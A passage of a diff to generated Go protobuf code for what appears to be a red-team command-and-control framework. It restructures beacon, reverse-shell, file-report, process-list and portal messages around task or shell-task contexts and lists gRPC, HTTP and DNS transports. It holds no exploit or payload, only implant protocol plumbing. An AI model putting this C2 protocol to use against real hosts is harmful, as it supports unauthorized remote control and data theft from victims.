file_c2_proto_rawDescGZIP(), []int{16} + return file_c2_proto_rawDescGZIP(), []int{18} } type ReportFileRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Context *TaskContext `protobuf:"bytes,1,opt,name=context,proto3" json:"context,omitempty"` - Chunk *epb.File `protobuf:"bytes,2,opt,name=chunk,proto3" json:"chunk,omitempty"` + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Context: + // + // *ReportFileRequest_TaskContext + // *ReportFileRequest_ShellTaskContext + Context isReportFileRequest_Context `protobuf_oneof:"context"` + Kind ReportFileKind `protobuf:"varint,3,opt,name=kind,proto3,enum=c2.ReportFileKind" json:"kind,omitempty"` + Chunk *epb.File `protobuf:"bytes,4,opt,name=chunk,proto3" json:"chunk,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *ReportFileRequest) Reset() { *x = ReportFileRequest{} - mi := &file_c2_proto_msgTypes[17] + mi := &file_c2_proto_msgTypes[19] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1194,7 +1436,7 @@ func (x *ReportFileRequest) String() string { func (*ReportFileRequest) ProtoMessage() {} func (x *ReportFileRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[17] + mi := &file_c2_proto_msgTypes[19] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1207,16 +1449,41 @@ func (x *ReportFileRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportFileRequest.ProtoReflect.Descriptor instead. func (*ReportFileRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{17} + return file_c2_proto_rawDescGZIP(), []int{19} } -func (x *ReportFileRequest) GetContext() *TaskContext { +func (x *ReportFileRequest) GetContext() isReportFileRequest_Context { if x != nil { return x.Context } return nil } +func (x *ReportFileRequest) GetTaskContext() *TaskContext { + if x != nil { + if x, ok := x.Context.(*ReportFileRequest_TaskContext); ok { + return x.TaskContext + } + } + return nil +} + +func (x *ReportFileRequest) GetShellTaskContext() *ShellTaskContext { + if x != nil { + if x, ok := x.Context.(*ReportFileRequest_ShellTaskContext); ok { + return x.ShellTaskContext + } + } + return nil +} + +func (x *ReportFileRequest) GetKind() ReportFileKind { + if x != nil { + return x.Kind + } + return ReportFileKind_REPORT_FILE_KIND_UNSPECIFIED +} + func (x *ReportFileRequest) GetChunk() *epb.File { if x != nil { return x.Chunk @@ -1224,6 +1491,22 @@ func (x *ReportFileRequest) GetChunk() *epb.File { return nil } +type isReportFileRequest_Context interface { + isReportFileRequest_Context() +} + +type ReportFileRequest_TaskContext struct { + TaskContext *TaskContext `protobuf:"bytes,1,opt,name=task_context,json=taskContext,proto3,oneof"` +} + +type ReportFileRequest_ShellTaskContext struct { + ShellTaskContext *ShellTaskContext `protobuf:"bytes,2,opt,name=shell_task_context,json=shellTaskContext,proto3,oneof"` +} + +func (*ReportFileRequest_TaskContext) isReportFileRequest_Context() {} + +func (*ReportFileRequest_ShellTaskContext) isReportFileRequest_Context() {} + type ReportFileResponse struct { state protoimpl.MessageState `protogen:"open.v1"` unknownFields protoimpl.UnknownFields @@ -1232,7 +1515,7 @@ type ReportFileResponse struct { func (x *ReportFileResponse) Reset() { *x = ReportFileResponse{} - mi := &file_c2_proto_msgTypes[18] + mi := &file_c2_proto_msgTypes[20] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1244,7 +1527,7 @@ func (x *ReportFileResponse) String() string { func (*ReportFileResponse) ProtoMessage() {} func (x *ReportFileResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[18] + mi := &file_c2_proto_msgTypes[20] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1257,20 +1540,24 @@ func (x *ReportFileResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportFileResponse.ProtoReflect.Descriptor instead. func (*ReportFileResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{18} + return file_c2_proto_rawDescGZIP(), []int{20} } type ReportProcessListRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Context *TaskContext `protobuf:"bytes,1,opt,name=context,proto3" json:"context,omitempty"` - List *epb.ProcessList `protobuf:"bytes,2,opt,name=list,proto3" json:"list,omitempty"` + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Context: + // + // *ReportProcessListRequest_TaskContext + // *ReportProcessListRequest_ShellTaskContext + Context isReportProcessListRequest_Context `protobuf_oneof:"context"` + List *epb.ProcessList `protobuf:"bytes,3,opt,name=list,proto3" json:"list,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *ReportProcessListRequest) Reset() { *x = ReportProcessListRequest{} - mi := &file_c2_proto_msgTypes[19] + mi := &file_c2_proto_msgTypes[21] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1282,7 +1569,7 @@ func (x *ReportProcessListRequest) String() string { func (*ReportProcessListRequest) ProtoMessage() {} func (x *ReportProcessListRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[19] + mi := &file_c2_proto_msgTypes[21] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1295,16 +1582,34 @@ func (x *ReportProcessListRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportProcessListRequest.ProtoReflect.Descriptor instead. func (*ReportProcessListRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{19} + return file_c2_proto_rawDescGZIP(), []int{21} } -func (x *ReportProcessListRequest) GetContext() *TaskContext { +func (x *ReportProcessListRequest) GetContext() isReportProcessListRequest_Context { if x != nil { return x.Context } return nil } +func (x *ReportProcessListRequest) GetTaskContext() *TaskContext { + if x != nil { + if x, ok := x.Context.(*ReportProcessListRequest_TaskContext); ok { + return x.TaskContext + } + } + return nil +} + +func (x *ReportProcessListRequest) GetShellTaskContext() *ShellTaskContext { + if x != nil { + if x, ok := x.Context.(*ReportProcessListRequest_ShellTaskContext); ok { + return x.ShellTaskContext + } + } + return nil +} + func (x *ReportProcessListRequest) GetList() *epb.ProcessList { if x != nil { return x.List @@ -1312,6 +1617,22 @@ func (x *ReportProcessListRequest) GetList() *epb.ProcessList { return nil } +type isReportProcessListRequest_Context interface { + isReportProcessListRequest_Context() +} + +type ReportProcessListRequest_TaskContext struct { + TaskContext *TaskContext `protobuf:"bytes,1,opt,name=task_context,json=taskContext,proto3,oneof"` +} + +type ReportProcessListRequest_ShellTaskContext struct { + ShellTaskContext *ShellTaskContext `protobuf:"bytes,2,opt,name=shell_task_context,json=shellTaskContext,proto3,oneof"` +} + +func (*ReportProcessListRequest_TaskContext) isReportProcessListRequest_Context() {} + +func (*ReportProcessListRequest_ShellTaskContext) isReportProcessListRequest_Context() {} + type ReportProcessListResponse struct { state protoimpl.MessageState `protogen:"open.v1"` unknownFields protoimpl.UnknownFields @@ -1320,7 +1641,7 @@ type ReportProcessListResponse struct { func (x *ReportProcessListResponse) Reset() { *x = ReportProcessListResponse{} - mi := &file_c2_proto_msgTypes[20] + mi := &file_c2_proto_msgTypes[22] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1332,7 +1653,7 @@ func (x *ReportProcessListResponse) String() string { func (*ReportProcessListResponse) ProtoMessage() {} func (x *ReportProcessListResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[20] + mi := &file_c2_proto_msgTypes[22] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1345,33 +1666,32 @@ func (x *ReportProcessListResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReportProcessListResponse.ProtoReflect.Descriptor instead. func (*ReportProcessListResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{20} + return file_c2_proto_rawDescGZIP(), []int{22} } -type ReportTaskOutputRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Output *TaskOutput `protobuf:"bytes,1,opt,name=output,proto3" json:"output,omitempty"` - Context *TaskContext `protobuf:"bytes,2,opt,name=context,proto3" json:"context,omitempty"` - ShellTaskOutput *ShellTaskOutput `protobuf:"bytes,3,opt,name=shell_task_output,json=shellTaskOutput,proto3" json:"shell_task_output,omitempty"` - unknownFields protoimpl.UnknownFields - sizeCache protoimpl.SizeCache +type ReportTaskOutputMessage struct { + state protoimpl.MessageState `protogen:"open.v1"` + Context *TaskContext `protobuf:"bytes,1,opt,name=context,proto3" json:"context,omitempty"` + Output *TaskOutput `protobuf:"bytes,2,opt,name=output,proto3" json:"output,omitempty"` + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache } -func (x *ReportTaskOutputRequest) Reset() { - *x = ReportTaskOutputRequest{} - mi := &file_c2_proto_msgTypes[21] +func (x *ReportTaskOutputMessage) Reset() { + *x = ReportTaskOutputMessage{} + mi := &file_c2_proto_msgTypes[23] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } -func (x *ReportTaskOutputRequest) String() string { +func (x *ReportTaskOutputMessage) String() string { return protoimpl.X.MessageStringOf(x) } -func (*ReportTaskOutputRequest) ProtoMessage() {} +func (*ReportTaskOutputMessage) ProtoMessage() {} -func (x *ReportTaskOutputRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[21] +func (x *ReportTaskOutputMessage) ProtoReflect() protoreflect.Message { + mi := &file_c2_proto_msgTypes[23] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1382,53 +1702,180 @@ func (x *ReportTaskOutputRequest) ProtoReflect() protoreflect.Message { return mi.MessageOf(x) } -// Deprecated: Use ReportTaskOutputRequest.ProtoReflect.Descriptor instead. -func (*ReportTaskOutputRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{21} +// Deprecated: Use ReportTaskOutputMessage.ProtoReflect.Descriptor instead. +func (*ReportTaskOutputMessage) Descriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{23} +} + +func (x *ReportTaskOutputMessage) GetContext() *TaskContext { + if x != nil { + return x.Context + } + return nil } -func (x *ReportTaskOutputRequest) GetOutput() *TaskOutput { +func (x *ReportTaskOutputMessage) GetOutput() *TaskOutput { if x != nil { return x.Output } return nil } -func (x *ReportTaskOutputRequest) GetContext() *TaskContext { +type ReportShellTaskOutputMessage struct { + state protoimpl.MessageState `protogen:"open.v1"` + Context *ShellTaskContext `protobuf:"bytes,1,opt,name=context,proto3" json:"context,omitempty"` + Output *ShellTaskOutput `protobuf:"bytes,2,opt,name=output,proto3" json:"output,omitempty"` + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ReportShellTaskOutputMessage) Reset() { + *x = ReportShellTaskOutputMessage{} + mi := &file_c2_proto_msgTypes[24] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ReportShellTaskOutputMessage) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ReportShellTaskOutputMessage) ProtoMessage() {} + +func (x *ReportShellTaskOutputMessage) ProtoReflect() protoreflect.Message { + mi := &file_c2_proto_msgTypes[24] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ReportShellTaskOutputMessage.ProtoReflect.Descriptor instead. +func (*ReportShellTaskOutputMessage) Descriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{24} +} + +func (x *ReportShellTaskOutputMessage) GetContext() *ShellTaskContext { if x != nil { return x.Context } return nil } -func (x *ReportTaskOutputRequest) GetShellTaskOutput() *ShellTaskOutput { +func (x *ReportShellTaskOutputMessage) GetOutput() *ShellTaskOutput { + if x != nil { + return x.Output + } + return nil +} + +type ReportOutputRequest struct { + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Message: + // + // *ReportOutputRequest_TaskOutput + // *ReportOutputRequest_ShellTaskOutput + Message isReportOutputRequest_Message `protobuf_oneof:"message"` + unknownFields protoimpl.UnknownFields + sizeCache protoimpl.SizeCache +} + +func (x *ReportOutputRequest) Reset() { + *x = ReportOutputRequest{} + mi := &file_c2_proto_msgTypes[25] + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + ms.StoreMessageInfo(mi) +} + +func (x *ReportOutputRequest) String() string { + return protoimpl.X.MessageStringOf(x) +} + +func (*ReportOutputRequest) ProtoMessage() {} + +func (x *ReportOutputRequest) ProtoReflect() protoreflect.Message { + mi := &file_c2_proto_msgTypes[25] + if x != nil { + ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) + if ms.LoadMessageInfo() == nil { + ms.StoreMessageInfo(mi) + } + return ms + } + return mi.MessageOf(x) +} + +// Deprecated: Use ReportOutputRequest.ProtoReflect.Descriptor instead. +func (*ReportOutputRequest) Descriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{25} +} + +func (x *ReportOutputRequest) GetMessage() isReportOutputRequest_Message { + if x != nil { + return x.Message + } + return nil +} + +func (x *ReportOutputRequest) GetTaskOutput() *ReportTaskOutputMessage { if x != nil { - return x.ShellTaskOutput + if x, ok := x.Message.(*ReportOutputRequest_TaskOutput); ok { + return x.TaskOutput + } } return nil } -type ReportTaskOutputResponse struct { +func (x *ReportOutputRequest) GetShellTaskOutput() *ReportShellTaskOutputMessage { + if x != nil { + if x, ok := x.Message.(*ReportOutputRequest_ShellTaskOutput); ok { + return x.ShellTaskOutput + } + } + return nil +} + +type isReportOutputRequest_Message interface { + isReportOutputRequest_Message() +} + +type ReportOutputRequest_TaskOutput struct { + TaskOutput *ReportTaskOutputMessage `protobuf:"bytes,1,opt,name=task_output,json=taskOutput,proto3,oneof"` +} + +type ReportOutputRequest_ShellTaskOutput struct { + ShellTaskOutput *ReportShellTaskOutputMessage `protobuf:"bytes,2,opt,name=shell_task_output,json=shellTaskOutput,proto3,oneof"` +} + +func (*ReportOutputRequest_TaskOutput) isReportOutputRequest_Message() {} + +func (*ReportOutputRequest_ShellTaskOutput) isReportOutputRequest_Message() {} + +type ReportOutputResponse struct { state protoimpl.MessageState `protogen:"open.v1"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } -func (x *ReportTaskOutputResponse) Reset() { - *x = ReportTaskOutputResponse{} - mi := &file_c2_proto_msgTypes[22] +func (x *ReportOutputResponse) Reset() { + *x = ReportOutputResponse{} + mi := &file_c2_proto_msgTypes[26] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } -func (x *ReportTaskOutputResponse) String() string { +func (x *ReportOutputResponse) String() string { return protoimpl.X.MessageStringOf(x) } -func (*ReportTaskOutputResponse) ProtoMessage() {} +func (*ReportOutputResponse) ProtoMessage() {} -func (x *ReportTaskOutputResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[22] +func (x *ReportOutputResponse) ProtoReflect() protoreflect.Message { + mi := &file_c2_proto_msgTypes[26] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1439,23 +1886,27 @@ func (x *ReportTaskOutputResponse) ProtoReflect() protoreflect.Message { return mi.MessageOf(x) } -// Deprecated: Use ReportTaskOutputResponse.ProtoReflect.Descriptor instead. -func (*ReportTaskOutputResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{22} +// Deprecated: Use ReportOutputResponse.ProtoReflect.Descriptor instead. +func (*ReportOutputResponse) Descriptor() ([]byte, []int) { + return file_c2_proto_rawDescGZIP(), []int{26} } type ReverseShellRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Kind ReverseShellMessageKind `protobuf:"varint,1,opt,name=kind,proto3,enum=c2.ReverseShellMessageKind" json:"kind,omitempty"` - Data []byte `protobuf:"bytes,2,opt,name=data,proto3" json:"data,omitempty"` - Context *TaskContext `protobuf:"bytes,3,opt,name=context,proto3" json:"context,omitempty"` + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Context: + // + // *ReverseShellRequest_TaskContext + // *ReverseShellRequest_ShellTaskContext + Context isReverseShellRequest_Context `protobuf_oneof:"context"` + Kind ReverseShellMessageKind `protobuf:"varint,3,opt,name=kind,proto3,enum=c2.ReverseShellMessageKind" json:"kind,omitempty"` + Data []byte `protobuf:"bytes,4,opt,name=data,proto3" json:"data,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *ReverseShellRequest) Reset() { *x = ReverseShellRequest{} - mi := &file_c2_proto_msgTypes[23] + mi := &file_c2_proto_msgTypes[27] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1467,7 +1918,7 @@ func (x *ReverseShellRequest) String() string { func (*ReverseShellRequest) ProtoMessage() {} func (x *ReverseShellRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[23] + mi := &file_c2_proto_msgTypes[27] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1480,7 +1931,32 @@ func (x *ReverseShellRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use ReverseShellRequest.ProtoReflect.Descriptor instead. func (*ReverseShellRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{23} + return file_c2_proto_rawDescGZIP(), []int{27} +} + +func (x *ReverseShellRequest) GetContext() isReverseShellRequest_Context { + if x != nil { + return x.Context + } + return nil +} + +func (x *ReverseShellRequest) GetTaskContext() *TaskContext { + if x != nil { + if x, ok := x.Context.(*ReverseShellRequest_TaskContext); ok { + return x.TaskContext + } + } + return nil +} + +func (x *ReverseShellRequest) GetShellTaskContext() *ShellTaskContext { + if x != nil { + if x, ok := x.Context.(*ReverseShellRequest_ShellTaskContext); ok { + return x.ShellTaskContext + } + } + return nil } func (x *ReverseShellRequest) GetKind() ReverseShellMessageKind { @@ -1497,13 +1973,22 @@ func (x *ReverseShellRequest) GetData() []byte { return nil } -func (x *ReverseShellRequest) GetContext() *TaskContext { - if x != nil { - return x.Context - } - return nil +type isReverseShellRequest_Context interface { + isReverseShellRequest_Context() } +type ReverseShellRequest_TaskContext struct { + TaskContext *TaskContext `protobuf:"bytes,1,opt,name=task_context,json=taskContext,proto3,oneof"` +} + +type ReverseShellRequest_ShellTaskContext struct { + ShellTaskContext *ShellTaskContext `protobuf:"bytes,2,opt,name=shell_task_context,json=shellTaskContext,proto3,oneof"` +} + +func (*ReverseShellRequest_TaskContext) isReverseShellRequest_Context() {} + +func (*ReverseShellRequest_ShellTaskContext) isReverseShellRequest_Context() {} + type ReverseShellResponse struct { state protoimpl.MessageState `protogen:"open.v1"` Kind ReverseShellMessageKind `protobuf:"varint,1,opt,name=kind,proto3,enum=c2.ReverseShellMessageKind" json:"kind,omitempty"` @@ -1514,7 +1999,7 @@ type ReverseShellResponse struct { func (x *ReverseShellResponse) Reset() { *x = ReverseShellResponse{} - mi := &file_c2_proto_msgTypes[24] + mi := &file_c2_proto_msgTypes[28] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1526,7 +2011,7 @@ func (x *ReverseShellResponse) String() string { func (*ReverseShellResponse) ProtoMessage() {} func (x *ReverseShellResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[24] + mi := &file_c2_proto_msgTypes[28] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1539,7 +2024,7 @@ func (x *ReverseShellResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use ReverseShellResponse.ProtoReflect.Descriptor instead. func (*ReverseShellResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{24} + return file_c2_proto_rawDescGZIP(), []int{28} } func (x *ReverseShellResponse) GetKind() ReverseShellMessageKind { @@ -1557,16 +2042,20 @@ func (x *ReverseShellResponse) GetData() []byte { } type CreatePortalRequest struct { - state protoimpl.MessageState `protogen:"open.v1"` - Context *TaskContext `protobuf:"bytes,1,opt,name=context,proto3" json:"context,omitempty"` - Mote *portalpb.Mote `protobuf:"bytes,2,opt,name=mote,proto3" json:"mote,omitempty"` + state protoimpl.MessageState `protogen:"open.v1"` + // Types that are valid to be assigned to Context: + // + // *CreatePortalRequest_TaskContext + // *CreatePortalRequest_ShellTaskContext + Context isCreatePortalRequest_Context `protobuf_oneof:"context"` + Mote *portalpb.Mote `protobuf:"bytes,3,opt,name=mote,proto3" json:"mote,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *CreatePortalRequest) Reset() { *x = CreatePortalRequest{} - mi := &file_c2_proto_msgTypes[25] + mi := &file_c2_proto_msgTypes[29] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1578,7 +2067,7 @@ func (x *CreatePortalRequest) String() string { func (*CreatePortalRequest) ProtoMessage() {} func (x *CreatePortalRequest) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[25] + mi := &file_c2_proto_msgTypes[29] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1591,16 +2080,34 @@ func (x *CreatePortalRequest) ProtoReflect() protoreflect.Message { // Deprecated: Use CreatePortalRequest.ProtoReflect.Descriptor instead. func (*CreatePortalRequest) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{25} + return file_c2_proto_rawDescGZIP(), []int{29} } -func (x *CreatePortalRequest) GetContext() *TaskContext { +func (x *CreatePortalRequest) GetContext() isCreatePortalRequest_Context { if x != nil { return x.Context } return nil } +func (x *CreatePortalRequest) GetTaskContext() *TaskContext { + if x != nil { + if x, ok := x.Context.(*CreatePortalRequest_TaskContext); ok { + return x.TaskContext + } + } + return nil +} + +func (x *CreatePortalRequest) GetShellTaskContext() *ShellTaskContext { + if x != nil { + if x, ok := x.Context.(*CreatePortalRequest_ShellTaskContext); ok { + return x.ShellTaskContext + } + } + return nil +} + func (x *CreatePortalRequest) GetMote() *portalpb.Mote { if x != nil { return x.Mote @@ -1608,16 +2115,32 @@ func (x *CreatePortalRequest) GetMote() *portalpb.Mote { return nil } +type isCreatePortalRequest_Context interface { + isCreatePortalRequest_Context() +} + +type CreatePortalRequest_TaskContext struct { + TaskContext *TaskContext `protobuf:"bytes,1,opt,name=task_context,json=taskContext,proto3,oneof"` +} + +type CreatePortalRequest_ShellTaskContext struct { + ShellTaskContext *ShellTaskContext `protobuf:"bytes,2,opt,name=shell_task_context,json=shellTaskContext,proto3,oneof"` +} + +func (*CreatePortalRequest_TaskContext) isCreatePortalRequest_Context() {} + +func (*CreatePortalRequest_ShellTaskContext) isCreatePortalRequest_Context() {} + type CreatePortalResponse struct { state protoimpl.MessageState `protogen:"open.v1"` - Mote *portalpb.Mote `protobuf:"bytes,2,opt,name=mote,proto3" json:"mote,omitempty"` + Mote *portalpb.Mote `protobuf:"bytes,1,opt,name=mote,proto3" json:"mote,omitempty"` unknownFields protoimpl.UnknownFields sizeCache protoimpl.SizeCache } func (x *CreatePortalResponse) Reset() { *x = CreatePortalResponse{} - mi := &file_c2_proto_msgTypes[26] + mi := &file_c2_proto_msgTypes[30] ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) ms.StoreMessageInfo(mi) } @@ -1629,7 +2152,7 @@ func (x *CreatePortalResponse) String() string { func (*CreatePortalResponse) ProtoMessage() {} func (x *CreatePortalResponse) ProtoReflect() protoreflect.Message { - mi := &file_c2_proto_msgTypes[26] + mi := &file_c2_proto_msgTypes[30] if x != nil { ms := protoimpl.X.MessageStateOf(protoimpl.Pointer(x)) if ms.LoadMessageInfo() == nil { @@ -1642,7 +2165,7 @@ func (x *CreatePortalResponse) ProtoReflect() protoreflect.Message { // Deprecated: Use CreatePortalResponse.ProtoReflect.Descriptor instead. func (*CreatePortalResponse) Descriptor() ([]byte, []int) { - return file_c2_proto_rawDescGZIP(), []int{26} + return file_c2_proto_rawDescGZIP(), []int{30} } func (x *CreatePortalResponse) GetMote() *portalpb.Mote { @@ -1654,140 +2177,313 @@ func (x *CreatePortalResponse) GetMote() *portalpb.Mote { var File_c2_proto protoreflect.FileDescriptor -const file_c2_proto_rawDesc = "" + - "\n" + - "\bc2.proto\x12\x02c2\x1a\x1fgoogle/protobuf/timestamp.proto\x1a\x0eeldritch.proto\x1a\fportal.proto\"'\n" + - "\x05Agent\x12\x1e\n" + - "\n" + - "identifier\x18\x01 \x01(\tR\n" + - "identifier\"\xd6\x01\n" + - "\tTransport\x12\x10\n" + - "\x03uri\x18\x01 \x01(\tR\x03uri\x12\x1a\n" + - "\binterval\x18\x02 \x01(\x04R\binterval\x12&\n" + - "\x04type\x18\x03 \x01(\x0e2\x12.c2.Transport.TypeR\x04type\x12\x14\n" + - "\x05extra\x18\x04 \x01(\tR\x05extra\"]\n" + - "\x04Type\x12\x19\n" + - "\x15TRANSPORT_UNSPECIFIED\x10\x00\x12\x12\n" + - "\x0eTRANSPORT_GRPC\x10\x01\x12\x13\n" + - "\x0fTRANSPORT_HTTP1\x10\x02\x12\x11\n" + - "\rTRANSPORT_DNS\x10\x03\"g\n" + - "\x13AvailableTransports\x12-\n" + - "\n" + - "transports\x18\x01 \x03(\v2\r.c2.TransportR\n" + - "transports\x12!\n" + - "\factive_index\x18\x02 \x01(\rR\vactiveIndex\"\xd1\x01\n" + - "\x06Beacon\x12\x1e\n" + - "\n" + - "identifier\x18\x01 \x01(\tR\n" + - "identifier\x12\x1c\n" + - "\tprincipal\x18\x02 \x01(\tR\tprincipal\x12\x1c\n" + - "\x04host\x18\x03 \x01(\v2\b.c2.HostR\x04host\x12\x1f\n" + - "\x05agent\x18\x04 \x01(\v2\t.c2.AgentR\x05agent\x12J\n" + - "\x14available_transports\x18\x05 \x01(\v2\x17.c2.AvailableTransportsR\x13availableTransports\"\xfe\x01\n" + - "\x04Host\x12\x1e\n" + - "\n" + - "identifier\x18\x01 \x01(\tR\n" + - "identifier\x12\x12\n" + - "\x04name\x18\x02 \x01(\tR\x04name\x12-\n" + - "\bplatform\x18\x03 \x01(\x0e2\x11.c2.Host.PlatformR\bplatform\x12\x1d\n" + - "\n" + - "primary_ip\x18\x04 \x01(\tR\tprimaryIp\"t\n" + - "\bPlatform\x12\x18\n" + - "\x14PLATFORM_UNSPECIFIED\x10\x00\x12\x14\n" + - "\x10PLATFORM_WINDOWS\x10\x01\x12\x12\n" + - "\x0ePLATFORM_LINUX\x10\x02\x12\x12\n" + - "\x0ePLATFORM_MACOS\x10\x03\x12\x10\n" + - "\fPLATFORM_BSD\x10\x04\"k\n" + - "\x04Task\x12\x0e\n" + - "\x02id\x18\x01 \x01(\x03R\x02id\x12\"\n" + - "\x04tome\x18\x02 \x01(\v2\x0e.eldritch.TomeR\x04tome\x12\x1d\n" + - "\n" + - "quest_name\x18\x03 \x01(\tR\tquestName\x12\x10\n" + - "\x03jwt\x18\x04 \x01(\tR\x03jwt\"\x8a\x01\n" + - "\tShellTask\x12\x0e\n" + - "\x02id\x18\x01 \x01(\x03R\x02id\x12\x14\n" + - "\x05input\x18\x02 \x01(\tR\x05input\x12\x19\n" + - "\bshell_id\x18\x03 \x01(\x03R\ashellId\x12\x1f\n" + - "\vsequence_id\x18\x04 \x01(\x04R\n" + - "sequenceId\x12\x1b\n" + - "\tstream_id\x18\x05 \x01(\tR\bstreamId\"\x1d\n" + - "\tTaskError\x12\x10\n" + - "\x03msg\x18\x01 \x01(\tR\x03msg\"\xe3\x01\n" + - "\n" + - "TaskOutput\x12\x0e\n" + - "\x02id\x18\x01 \x01(\x03R\x02id\x12\x16\n" + - "\x06output\x18\x02 \x01(\tR\x06output\x12#\n" + - "\x05error\x18\x03 \x01(\v2\r.c2.TaskErrorR\x05error\x12B\n" + - "\x0fexec_started_at\x18\x04 \x01(\v2\x1a.google.protobuf.TimestampR\rexecStartedAt\x12D\n" + - "\x10exec_finished_at\x18\x05 \x01(\v2\x1a.google.protobuf.TimestampR\x0eexecFinishedAt\"\xe8\x01\n" + - "\x0fShellTaskOutput\x12\x0e\n" + - "\x02id\x18\x01 \x01(\x03R\x02id\x12\x16\n" + - "\x06output\x18\x02 \x01(\tR\x06output\x12#\n" + - "\x05error\x18\x03 \x01(\v2\r.c2.TaskErrorR\x05error\x12B\n" + - "\x0fexec_started_at\x18\x04 \x01(\v2\x1a.google.protobuf.TimestampR\rexecStartedAt\x12D\n" + - "\x10exec_finished_at\x18\x05 \x01(\v2\x1a.google.protobuf.TimestampR\x0eexecFinishedAt\"8\n" + - "\vTaskContext\x12\x17\n" + - "\atask_id\x18\x01 \x01(\x03R\x06taskId\x12\x10\n" + - "\x03jwt\x18\x02 \x01(\tR\x03jwt\"7\n" + - "\x11ClaimTasksRequest\x12\"\n" + - "\x06beacon\x18\x01 \x01(\v2\n" + - ".c2.BeaconR\x06beacon\"d\n" + - "\x12ClaimTasksResponse\x12\x1e\n" 